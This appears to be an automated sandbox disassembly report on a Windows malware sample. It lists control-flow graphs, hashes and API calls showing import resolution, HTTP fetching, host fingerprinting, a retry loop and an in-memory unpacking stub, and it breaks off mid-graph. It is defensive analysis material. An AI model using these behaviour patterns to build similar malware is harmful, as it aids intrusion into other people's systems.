                                          • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 633 419c10-419c1a 634 419c20-41a031 GetProcAddress * 43 633->634 635 41a036-41a0ca LoadLibraryA * 8 633->635 634->635 636 41a146-41a14d 635->636 637 41a0cc-41a141 GetProcAddress * 5 635->637 638 41a153-41a211 GetProcAddress * 8 636->638 639 41a216-41a21d 636->639 637->636 638->639 640 41a298-41a29f 639->640 641 41a21f-41a293 GetProcAddress * 5 639->641 642 41a2a5-41a332 GetProcAddress * 6 640->642 643 41a337-41a33e 640->643 641->640 642->643 644 41a344-41a41a GetProcAddress * 9 643->644 645 41a41f-41a426 643->645 644->645 646 41a4a2-41a4a9 645->646 647 41a428-41a49d GetProcAddress * 5 645->647 648 41a4ab-41a4d7 GetProcAddress * 2 646->648 649 41a4dc-41a4e3 646->649 647->646 648->649 650 41a515-41a51c 649->650 651 41a4e5-41a510 GetProcAddress * 2 649->651 652 41a612-41a619 650->652 653 41a522-41a60d GetProcAddress * 10 650->653 651->650 654 41a61b-41a678 GetProcAddress * 4 652->654 655 41a67d-41a684 652->655 653->652 654->655 656 41a686-41a699 GetProcAddress 655->656 657 41a69e-41a6a5 655->657 656->657 658 41a6a7-41a703 GetProcAddress * 4 657->658 659 41a708-41a709 657->659 658->659
                                          APIs
                                          • GetProcAddress.KERNEL32(75900000,00944660), ref: 00419C2D
                                          • GetProcAddress.KERNEL32(75900000,009448C0), ref: 00419C45
                                          • GetProcAddress.KERNEL32(75900000,0094BF18), ref: 00419C5E
                                          • GetProcAddress.KERNEL32(75900000,0094BF30), ref: 00419C76
                                          • GetProcAddress.KERNEL32(75900000,0094BEA0), ref: 00419C8E
                                          • GetProcAddress.KERNEL32(75900000,0094BEB8), ref: 00419CA7
                                          • GetProcAddress.KERNEL32(75900000,00949308), ref: 00419CBF
                                          • GetProcAddress.KERNEL32(75900000,0094BED0), ref: 00419CD7
                                          • GetProcAddress.KERNEL32(75900000,0094BF48), ref: 00419CF0
                                          • GetProcAddress.KERNEL32(75900000,0094BEE8), ref: 00419D08
                                          • GetProcAddress.KERNEL32(75900000,0094BF00), ref: 00419D20
                                          • GetProcAddress.KERNEL32(75900000,009446E0), ref: 00419D39
                                          • GetProcAddress.KERNEL32(75900000,00944720), ref: 00419D51
                                          • GetProcAddress.KERNEL32(75900000,009447A0), ref: 00419D69
                                          • GetProcAddress.KERNEL32(75900000,009448A0), ref: 00419D82
                                          • GetProcAddress.KERNEL32(75900000,0094BF60), ref: 00419D9A
                                          • GetProcAddress.KERNEL32(75900000,0097B078), ref: 00419DB2
                                          • GetProcAddress.KERNEL32(75900000,009491A0), ref: 00419DCB
                                          • GetProcAddress.KERNEL32(75900000,00944700), ref: 00419DE3
                                          • GetProcAddress.KERNEL32(75900000,0097B090), ref: 00419DFB
                                          • GetProcAddress.KERNEL32(75900000,0097B0F0), ref: 00419E14
                                          • GetProcAddress.KERNEL32(75900000,0097B0D8), ref: 00419E2C
                                          • GetProcAddress.KERNEL32(75900000,0097B0A8), ref: 00419E44
                                          • GetProcAddress.KERNEL32(75900000,00944740), ref: 00419E5D
                                          • GetProcAddress.KERNEL32(75900000,0097B048), ref: 00419E75
                                          • GetProcAddress.KERNEL32(75900000,0097B030), ref: 00419E8D
                                          • GetProcAddress.KERNEL32(75900000,0097B0C0), ref: 00419EA6
                                          • GetProcAddress.KERNEL32(75900000,0097B060), ref: 00419EBE
                                          • GetProcAddress.KERNEL32(75900000,0097ADC0), ref: 00419ED6
                                          • GetProcAddress.KERNEL32(75900000,0097AE80), ref: 00419EEF
                                          • GetProcAddress.KERNEL32(75900000,0097AD90), ref: 00419F07
                                          • GetProcAddress.KERNEL32(75900000,0097AFA0), ref: 00419F1F
                                          • GetProcAddress.KERNEL32(75900000,0097AEF8), ref: 00419F38
                                          • GetProcAddress.KERNEL32(75900000,00948E30), ref: 00419F50
                                          • GetProcAddress.KERNEL32(75900000,0097AF88), ref: 00419F68
                                          • GetProcAddress.KERNEL32(75900000,0097AD30), ref: 00419F81
                                          • GetProcAddress.KERNEL32(75900000,00944760), ref: 00419F99
                                          • GetProcAddress.KERNEL32(75900000,0097AEC8), ref: 00419FB1
                                          • GetProcAddress.KERNEL32(75900000,00944820), ref: 00419FCA
                                          • GetProcAddress.KERNEL32(75900000,0097AD60), ref: 00419FE2
                                          • GetProcAddress.KERNEL32(75900000,0097AD78), ref: 00419FFA
                                          • GetProcAddress.KERNEL32(75900000,00944840), ref: 0041A013
                                          • GetProcAddress.KERNEL32(75900000,00944860), ref: 0041A02B
                                          • LoadLibraryA.KERNEL32(0097AEE0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                          • LoadLibraryA.KERNEL32(0097ADA8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                          • LoadLibraryA.KERNEL32(0097AE08,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                          • LoadLibraryA.KERNEL32(0097ADF0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
                                          • LoadLibraryA.KERNEL32(0097ADD8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A083
                                          • LoadLibraryA.KERNEL32(0097AE20,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A095
                                          • LoadLibraryA.KERNEL32(0097AE38,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0A7
                                          • LoadLibraryA.KERNEL32(0097AF40,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A0B8
                                          • GetProcAddress.KERNEL32(75FD0000,00944880), ref: 0041A0DA
                                          • GetProcAddress.KERNEL32(75FD0000,0097AE50), ref: 0041A0F2
                                          • GetProcAddress.KERNEL32(75FD0000,00978438), ref: 0041A10A
                                          • GetProcAddress.KERNEL32(75FD0000,0097AD48), ref: 0041A123
                                          • GetProcAddress.KERNEL32(75FD0000,00944A00), ref: 0041A13B
                                          • GetProcAddress.KERNEL32(73B30000,009491F0), ref: 0041A160
                                          • GetProcAddress.KERNEL32(73B30000,00944B40), ref: 0041A179
                                          • GetProcAddress.KERNEL32(73B30000,00949510), ref: 0041A191
                                          • GetProcAddress.KERNEL32(73B30000,0097B000), ref: 0041A1A9
                                          • GetProcAddress.KERNEL32(73B30000,0097AF70), ref: 0041A1C2
                                          • GetProcAddress.KERNEL32(73B30000,00944CE0), ref: 0041A1DA
                                          • GetProcAddress.KERNEL32(73B30000,00944A20), ref: 0041A1F2
                                          • GetProcAddress.KERNEL32(73B30000,0097AE68), ref: 0041A20B
                                          • GetProcAddress.KERNEL32(763B0000,00944B60), ref: 0041A22C
                                          • GetProcAddress.KERNEL32(763B0000,00944B20), ref: 0041A244
                                          • GetProcAddress.KERNEL32(763B0000,0097AE98), ref: 0041A25D
                                          • GetProcAddress.KERNEL32(763B0000,0097AEB0), ref: 0041A275
                                          • GetProcAddress.KERNEL32(763B0000,00944B80), ref: 0041A28D
                                          • GetProcAddress.KERNEL32(750F0000,009493F8), ref: 0041A2B3
                                          • GetProcAddress.KERNEL32(750F0000,00949060), ref: 0041A2CB
                                          • GetProcAddress.KERNEL32(750F0000,0097AFB8), ref: 0041A2E3
                                          • GetProcAddress.KERNEL32(750F0000,00944D80), ref: 0041A2FC
                                          • GetProcAddress.KERNEL32(750F0000,00944BE0), ref: 0041A314
                                          • GetProcAddress.KERNEL32(750F0000,009493D0), ref: 0041A32C
                                          • GetProcAddress.KERNEL32(75A50000,0097AF10), ref: 0041A352
                                          • GetProcAddress.KERNEL32(75A50000,00944DA0), ref: 0041A36A
                                          • GetProcAddress.KERNEL32(75A50000,009782E8), ref: 0041A382
                                          • GetProcAddress.KERNEL32(75A50000,0097AFD0), ref: 0041A39B
                                          • GetProcAddress.KERNEL32(75A50000,0097AFE8), ref: 0041A3B3
                                          • GetProcAddress.KERNEL32(75A50000,00944A80), ref: 0041A3CB
                                          • GetProcAddress.KERNEL32(75A50000,00944D00), ref: 0041A3E4
                                          • GetProcAddress.KERNEL32(75A50000,0097AF28), ref: 0041A3FC
                                          • GetProcAddress.KERNEL32(75A50000,0097B018), ref: 0041A414
                                          • GetProcAddress.KERNEL32(75070000,00944A40), ref: 0041A436
                                          • GetProcAddress.KERNEL32(75070000,0097AF58), ref: 0041A44E
                                          • GetProcAddress.KERNEL32(75070000,0097B288), ref: 0041A466
                                          • GetProcAddress.KERNEL32(75070000,0097B390), ref: 0041A47F
                                          • GetProcAddress.KERNEL32(75070000,0097B1B0), ref: 0041A497
                                          • GetProcAddress.KERNEL32(74E50000,00944B00), ref: 0041A4B8
                                          • GetProcAddress.KERNEL32(74E50000,00944D20), ref: 0041A4D1
                                          • GetProcAddress.KERNEL32(75320000,00944A60), ref: 0041A4F2
                                          • GetProcAddress.KERNEL32(75320000,0097B360), ref: 0041A50A
                                          • GetProcAddress.KERNEL32(6F060000,00944AC0), ref: 0041A530
                                          • GetProcAddress.KERNEL32(6F060000,00944BA0), ref: 0041A548
                                          • GetProcAddress.KERNEL32(6F060000,00944AA0), ref: 0041A560
                                          • GetProcAddress.KERNEL32(6F060000,0097B420), ref: 0041A579
                                          • GetProcAddress.KERNEL32(6F060000,00944AE0), ref: 0041A591
                                          • GetProcAddress.KERNEL32(6F060000,00944BC0), ref: 0041A5A9
                                          • GetProcAddress.KERNEL32(6F060000,00944C00), ref: 0041A5C2
                                          • GetProcAddress.KERNEL32(6F060000,00944C20), ref: 0041A5DA
                                          • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0041A5F1
                                          • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0041A607
                                          • GetProcAddress.KERNEL32(74E00000,0097B198), ref: 0041A629
                                          • GetProcAddress.KERNEL32(74E00000,00978488), ref: 0041A641
                                          • GetProcAddress.KERNEL32(74E00000,0097B318), ref: 0041A659
                                          • GetProcAddress.KERNEL32(74E00000,0097B2A0), ref: 0041A672
                                          • GetProcAddress.KERNEL32(74DF0000,00944C40), ref: 0041A693
                                          • GetProcAddress.KERNEL32(6D0D0000,0097B408), ref: 0041A6B4
                                          • GetProcAddress.KERNEL32(6D0D0000,00944D40), ref: 0041A6CD
                                          • GetProcAddress.KERNEL32(6D0D0000,0097B1C8), ref: 0041A6E5
                                          • GetProcAddress.KERNEL32(6D0D0000,0097B3F0), ref: 0041A6FD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad
                                          • String ID: HttpQueryInfoA$InternetSetOptionA
                                          • API String ID: 2238633743-1775429166
                                          • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                          • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                          • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                          • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1001 406280-40630b call 41a7a0 call 4047b0 call 41a740 InternetOpenA StrCmpCA 1008 406314-406318 1001->1008 1009 40630d 1001->1009 1010 406509-406525 call 41a7a0 call 41a800 * 2 1008->1010 1011 40631e-406342 InternetConnectA 1008->1011 1009->1008 1029 406528-40652d 1010->1029 1012 406348-40634c 1011->1012 1013 4064ff-406503 InternetCloseHandle 1011->1013 1015 40635a 1012->1015 1016 40634e-406358 1012->1016 1013->1010 1018 406364-406392 HttpOpenRequestA 1015->1018 1016->1018 1021 4064f5-4064f9 InternetCloseHandle 1018->1021 1022 406398-40639c 1018->1022 1021->1013 1024 4063c5-406405 HttpSendRequestA HttpQueryInfoA 1022->1024 1025 40639e-4063bf InternetSetOptionA 1022->1025 1027 406407-406427 call 41a740 call 41a800 * 2 1024->1027 1028 40642c-40644b call 418940 1024->1028 1025->1024 1027->1029 1034 4064c9-4064e9 call 41a740 call 41a800 * 2 1028->1034 1035 40644d-406454 1028->1035 1034->1029 1039 406456-406480 InternetReadFile 1035->1039 1040 4064c7-4064ef InternetCloseHandle 1035->1040 1044 406482-406489 1039->1044 1045 40648b 1039->1045 1040->1021 1044->1045 1048 40648d-4064c5 call 41a9b0 call 41a8a0 call 41a800 1044->1048 1045->1040 1048->1039
                                          APIs
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                            • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                            • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                            • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                            • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                          • StrCmpCA.SHLWAPI(?,00978648), ref: 00406303
                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                          • HttpOpenRequestA.WININET(00000000,GET,?,0097C5F8,00000000,00000000,00400100,00000000), ref: 00406385
                                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                          • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                          • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                          • InternetCloseHandle.WININET(00000000), ref: 00406503
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                          • String ID: ERROR$ERROR$GET
                                          • API String ID: 3074848878-2509457195
                                          • Opcode ID: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                          • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                          • Opcode Fuzzy Hash: 080261753b6033409e8309b3227ccdbaa0f04c8b4696de884a7f81660436c8d0
                                          • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1058 4117a0-4117cd call 41aad0 StrCmpCA 1061 4117d7-4117f1 call 41aad0 strtok_s 1058->1061 1062 4117cf-4117d1 ExitProcess 1058->1062 1065 4117f4-4117f8 1061->1065 1066 4119c2-4119cd call 41a800 1065->1066 1067 4117fe-411811 1065->1067 1069 411817-41181a 1067->1069 1070 41199e-4119bd strtok_s 1067->1070 1072 411821-411830 call 41a820 1069->1072 1073 411849-411858 call 41a820 1069->1073 1074 4118ad-4118be StrCmpCA 1069->1074 1075 4118cf-4118e0 StrCmpCA 1069->1075 1076 41198f-411999 call 41a820 1069->1076 1077 4118f1-411902 StrCmpCA 1069->1077 1078 411951-411962 StrCmpCA 1069->1078 1079 411970-411981 StrCmpCA 1069->1079 1080 411913-411924 StrCmpCA 1069->1080 1081 411932-411943 StrCmpCA 1069->1081 1082 411835-411844 call 41a820 1069->1082 1083 41185d-41186e StrCmpCA 1069->1083 1084 41187f-411890 StrCmpCA 1069->1084 1070->1065 1072->1070 1073->1070 1105 4118c0-4118c3 1074->1105 1106 4118ca 1074->1106 1085 4118e2-4118e5 1075->1085 1086 4118ec 1075->1086 1076->1070 1087 411904-411907 1077->1087 1088 41190e 1077->1088 1093 411964-411967 1078->1093 1094 41196e 1078->1094 1096 411983-411986 1079->1096 1097 41198d 1079->1097 1089 411930 1080->1089 1090 411926-411929 1080->1090 1091 411945-411948 1081->1091 1092 41194f 1081->1092 1082->1070 1101 411870-411873 1083->1101 1102 41187a 1083->1102 1103 411892-41189c 1084->1103 1104 41189e-4118a1 1084->1104 1085->1086 1086->1070 1087->1088 1088->1070 1089->1070 1090->1089 1091->1092 1092->1070 1093->1094 1094->1070 1096->1097 1097->1070 1101->1102 1102->1070 1110 4118a8 1103->1110 1104->1110 1105->1106 1106->1070 1110->1070
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcessstrtok_s
                                          • String ID: block
                                          • API String ID: 3407564107-2199623458
                                          • Opcode ID: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                          • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                          • Opcode Fuzzy Hash: 2fed056f04860ab53dc55cf46fa0ad5f7b81b83e30ecc022536dc59065cce9ea
                                          • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1111 415510-415577 call 415ad0 call 41a820 * 3 call 41a740 * 4 1127 41557c-415583 1111->1127 1128 415585-4155b6 call 41a820 call 41a7a0 call 401590 call 4151f0 1127->1128 1129 4155d7-41564c call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1127->1129 1145 4155bb-4155d2 call 41a8a0 call 41a800 1128->1145 1155 415693-4156a9 call 41aad0 StrCmpCA 1129->1155 1159 41564e-41568e call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1129->1159 1145->1155 1160 4157dc-415844 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1155->1160 1161 4156af-4156b6 1155->1161 1159->1155 1291 415ac3-415ac6 1160->1291 1164 4157da-41585f call 41aad0 StrCmpCA 1161->1164 1165 4156bc-4156c3 1161->1165 1184 415991-4159f9 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1164->1184 1185 415865-41586c 1164->1185 1169 4156c5-415719 call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1165->1169 1170 41571e-415793 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1165->1170 1169->1164 1170->1164 1270 415795-4157d5 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1170->1270 1184->1291 1191 415872-415879 1185->1191 1192 41598f-415a14 call 41aad0 StrCmpCA 1185->1192 1199 4158d3-415948 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1191->1199 1200 41587b-4158ce call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1191->1200 1220 415a16-415a21 Sleep 1192->1220 1221 415a28-415a91 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1192->1221 1199->1192 1296 41594a-41598a call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1199->1296 1200->1192 1220->1127 1221->1291 1270->1164 1296->1192
                                          APIs
                                            • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00946070,?,0042110C,?,00000000), ref: 0041A82B
                                            • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                            • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                            • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                            • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                            • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                            • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                          • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpylstrlen$Sleepstrtok
                                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                          • API String ID: 3630751533-2791005934
                                          • Opcode ID: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                          • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                                          • Opcode Fuzzy Hash: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                          • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1322 417500-41754a GetWindowsDirectoryA 1323 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1322->1323 1324 41754c 1322->1324 1331 4175d8-4175df 1323->1331 1324->1323 1332 4175e1-4175fa call 418d00 1331->1332 1333 4175fc-417617 GetProcessHeap HeapAlloc 1331->1333 1332->1331 1334 417619-417626 call 41a740 1333->1334 1335 417628-417658 wsprintfA call 41a740 1333->1335 1343 41767e-41768e 1334->1343 1335->1343
                                          APIs
                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                          • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                          • wsprintfA.USER32 ref: 00417640
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2219633257.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2219633257.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_RJQySowVRb.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                          • String ID: :$C$\
                                          • API String ID: 3790021787-3809124531
                                          • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                          • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                          • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                          • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1344 22d003c-22d0047 1345 22d004c-22d0263 call 22d0a3f call 22d0e0f call 22d0d90 VirtualAlloc 1344->1345 1346 22d0049 1344->1346 1361 22d028b-22d0292 1345->1361 1362 22d0265-22d0289 call 22d0a69 1345->1362 1346->1345 1363 22d02a1-22d02b0 1361->1363 1366 22d02ce-22d03c2 VirtualProtect call 22d0cce call 22d0ce7 1362->1366 1363->1366 1367 22d02b2-22d02cc 1363->1367 1373 22d03d1-22d03e0 1366->1373 1367->1363 1374 22d0439-22d04b8 VirtualFree 1373->1374 1375 22d03e2-22d0437 call 22d0ce7 1373->1375 1376 22d04be-22d04cd 1374->1376 1377 22d05f4-22d05fe 1374->1377 1375->1373 1379 22d04d3-22d04dd 1376->1379 1380 22d077f-22d0789 1377->1380 1381 22d0604-22d060d 1377->1381 1379->1377 1385 22d04e3-22d0505 LoadLibraryA 1379->1385 1383 22d078b-22d07a3 1380->1383 1384 22d07a6-22d07b0 1380->1384 1381->1380 1386 22d0613-22d0637 1381->1386 1383->1384 1388 22d086e-22d08be LoadLibraryA 1384->1388 1389 22d07b6-22d07cb 1384->1389 1390 22d0517-22d0520 1385->1390 1391 22d0507-22d0515 1385->1391 1392 22d063e-22d0648 1386->1392 1396 22d08c7-22d08f9 1388->1396 1393 22d07d2-22d07d5 1389->1393 1394 22d0526-22d0547 1390->1394 1391->1394 1392->1380 1395 22d064e-22d065a 1392->1395 1397 